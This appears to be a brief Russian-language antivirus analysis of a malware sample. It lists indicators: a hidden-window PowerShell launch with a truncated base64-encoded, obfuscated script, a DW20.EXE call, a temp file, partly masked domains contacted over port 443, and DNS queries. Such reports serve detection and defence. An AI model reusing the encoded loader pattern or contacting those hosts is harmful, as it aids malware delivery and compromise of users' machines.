Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAMwBJAFAAIAA9AFsAVAB5AFAARQBdACgAIgB7ADIAfQB7ADUAfQB7ADYAfQB7ADAAfQB7ADMAfQB7ADEAfQB7ADQAfQAiAC0ARgAgACcATQAuACcALAAnAGQAaQBSAEUAJwAsACcAUwAnACwAJwBpAE8ALgAnACwAJw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1532
- %TEMP%\1087872.cvr
- 'si#####ngaspremier.org':443
- 'ne##help.gr':443
- 'vi###napyme.com':443
- 'bo####upplies.com':443
- 'ma####sampietro.ch':443
- 'li##o.com':443
- DNS ASK ne##help.gr
- DNS ASK co####erjungle.it
- DNS ASK po#####damsterdam.nl
- DNS ASK vi###napyme.com
- DNS ASK bo####upplies.com
- DNS ASK ma####sampietro.ch
- DNS ASK li##o.com
- DNS ASK si#####ngaspremier.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAMwBJAFAAIAA9AFsAVAB5AFAARQBdACgAIgB7ADIAfQB7ADUAfQB7ADYAfQB7ADAAfQB7ADMAfQB7ADEAfQB7ADQAfQAiAC0ARgAgACcATQAuACcALAAnAGQAaQBSAEUAJwAsACcAUwAnACwAJwBpAE8ALgAnACwAJw...' (со скрытым окном)